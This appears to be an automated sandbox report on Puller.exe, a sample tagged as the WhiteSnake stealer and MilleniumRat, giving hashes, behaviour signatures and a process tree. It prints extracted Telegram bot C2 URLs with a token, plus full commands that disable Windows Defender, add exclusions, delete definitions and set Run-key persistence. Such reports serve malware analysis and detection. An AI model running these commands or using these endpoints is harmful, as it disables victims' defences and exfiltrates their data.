Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 04:57

General

  • Target

    Puller.exe

  • Size

    39.9MB

  • MD5

    b704b787e63bb954c3e2be7704d1c804

  • SHA1

    ec0687caa82781428a976c5611495b7efb0c4943

  • SHA256

    b9a40da2cac88cbf1d4b197fc40eed020a2334b86f61c7b9e007cc1191f45f2e

  • SHA512

    54ddad82d1d7cba52433c46d6d446b8332f5a9aa4ac31debeda09e656c7e7979fef315057eea60d26df3e182e0f78efe1513ce0aa001f4b4f501150cdbb9b37b

  • SSDEEP

    786432:iK0h9QiIAkxMF/AAh6ABxn5v7bN3mmJm9OojrggM5SO4Lb69bgD7:iKXikMAU6s5v7UD9O6rggMYbs

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Contacts a large (1337) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 55 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 12 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:60
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:512
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1104
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1112
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1164
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1176
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:3008
                          • C:\Program Files\Google\Chrome\updater.exe
                            "C:\Program Files\Google\Chrome\updater.exe"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:9180
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1256
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1344
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1408
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1436
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2888
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1572
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1584
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1668
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1700
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1736
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1796
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1800
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1904
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1912
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1964
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1972
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1468
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2132
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2244
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2260
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2372
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2380
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2548
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2608
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2620
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2644
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2660
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2880
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3016
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:664
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3340
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3440
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Puller.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Puller.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:5048
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Puller.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Puller.exe"
                                                                                              3⤵
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4500
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI50482\Build.exe -pbeznogym
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2204
                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI50482\Build.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI50482\Build.exe -pbeznogym
                                                                                                  5⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3848
                                                                                                  • C:\ProgramData\Microsoft\hacn.exe
                                                                                                    "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2432
                                                                                                    • C:\ProgramData\Microsoft\hacn.exe
                                                                                                      "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4948
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI24322\s.exe -pbeznogym
                                                                                                        8⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1480
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI24322\s.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI24322\s.exe -pbeznogym
                                                                                                          9⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2860
                                                                                                          • C:\ProgramData\main.exe
                                                                                                            "C:\ProgramData\main.exe"
                                                                                                            10⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1052
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2AB5.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2AB5.tmp.bat
                                                                                                              11⤵
                                                                                                                PID:9048
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  12⤵
                                                                                                                    PID:9088
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    Tasklist /fi "PID eq 1052"
                                                                                                                    12⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:9184
                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                    find ":"
                                                                                                                    12⤵
                                                                                                                      PID:9200
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                      12⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:6516
                                                                                                                    • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                                      12⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4860
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                        13⤵
                                                                                                                          PID:8508
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            14⤵
                                                                                                                              PID:5536
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                              14⤵
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Modifies registry key
                                                                                                                              PID:2800
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4860 -s 2856
                                                                                                                            13⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:8908
                                                                                                                    • C:\ProgramData\svchost.exe
                                                                                                                      "C:\ProgramData\svchost.exe"
                                                                                                                      10⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:436
                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                                        11⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2256
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                                          12⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4132
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                                            13⤵
                                                                                                                            • Modifies WinLogon for persistence
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5556
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tcrfared\tcrfared.cmdline"
                                                                                                                              14⤵
                                                                                                                                PID:7676
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2054.tmp" "c:\ProgramData\CSC9E9575D59FB34C4EA5B1B37072BBCCBA.TMP"
                                                                                                                                  15⤵
                                                                                                                                    PID:7520
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nyxrocbw\nyxrocbw.cmdline"
                                                                                                                                  14⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  PID:7464
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2110.tmp" "c:\Windows\System32\CSC23C264F493CC4D3D8D658CC1B8CED0A1.TMP"
                                                                                                                                    15⤵
                                                                                                                                      PID:7388
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J37gN1JXPr.bat"
                                                                                                                                    14⤵
                                                                                                                                      PID:8196
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        15⤵
                                                                                                                                          PID:2200
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          15⤵
                                                                                                                                            PID:8104
                                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                            15⤵
                                                                                                                                              PID:8056
                                                                                                                                            • C:\Windows\ShellExperiences\csrss.exe
                                                                                                                                              "C:\Windows\ShellExperiences\csrss.exe"
                                                                                                                                              15⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:4848
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SbXYQ83spR.bat"
                                                                                                                                                16⤵
                                                                                                                                                  PID:2424
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    17⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2808
                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                    chcp 65001
                                                                                                                                                    17⤵
                                                                                                                                                      PID:116
                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                      17⤵
                                                                                                                                                        PID:4628
                                                                                                                                                      • C:\Windows\ShellExperiences\csrss.exe
                                                                                                                                                        "C:\Windows\ShellExperiences\csrss.exe"
                                                                                                                                                        17⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:4908
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\26i24I6rG0.bat"
                                                                                                                                                          18⤵
                                                                                                                                                            PID:8692
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              19⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:6320
                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                              chcp 65001
                                                                                                                                                              19⤵
                                                                                                                                                                PID:8956
                                                                                                                                                              • C:\Windows\system32\w32tm.exe
                                                                                                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                19⤵
                                                                                                                                                                  PID:5020
                                                                                                                                                                • C:\Windows\ShellExperiences\csrss.exe
                                                                                                                                                                  "C:\Windows\ShellExperiences\csrss.exe"
                                                                                                                                                                  19⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:6364
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uhjF8j8k7U.bat"
                                                                                                                                                                    20⤵
                                                                                                                                                                      PID:5048
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5460
                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                        chcp 65001
                                                                                                                                                                        21⤵
                                                                                                                                                                          PID:6512
                                                                                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                          21⤵
                                                                                                                                                                            PID:3924
                                                                                                                                                                          • C:\Windows\ShellExperiences\csrss.exe
                                                                                                                                                                            "C:\Windows\ShellExperiences\csrss.exe"
                                                                                                                                                                            21⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:6932
                                                                                                                                                    • C:\ProgramData\crss.exe
                                                                                                                                                      "C:\ProgramData\crss.exe"
                                                                                                                                                      10⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:5112
                                                                                                                                                      • C:\ProgramData\crss.exe
                                                                                                                                                        "C:\ProgramData\crss.exe"
                                                                                                                                                        11⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3768
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                          12⤵
                                                                                                                                                            PID:1848
                                                                                                                                                      • C:\ProgramData\setup.exe
                                                                                                                                                        "C:\ProgramData\setup.exe"
                                                                                                                                                        10⤵
                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        PID:3452
                                                                                                                                              • C:\ProgramData\Microsoft\based.exe
                                                                                                                                                "C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:4712
                                                                                                                                                • C:\ProgramData\Microsoft\based.exe
                                                                                                                                                  "C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:4524
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                                                    8⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:5028
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                                                      9⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:8
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                    8⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2156
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                      9⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3968
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Plese use temp', 0, 'Not supported', 48+16);close()""
                                                                                                                                                    8⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
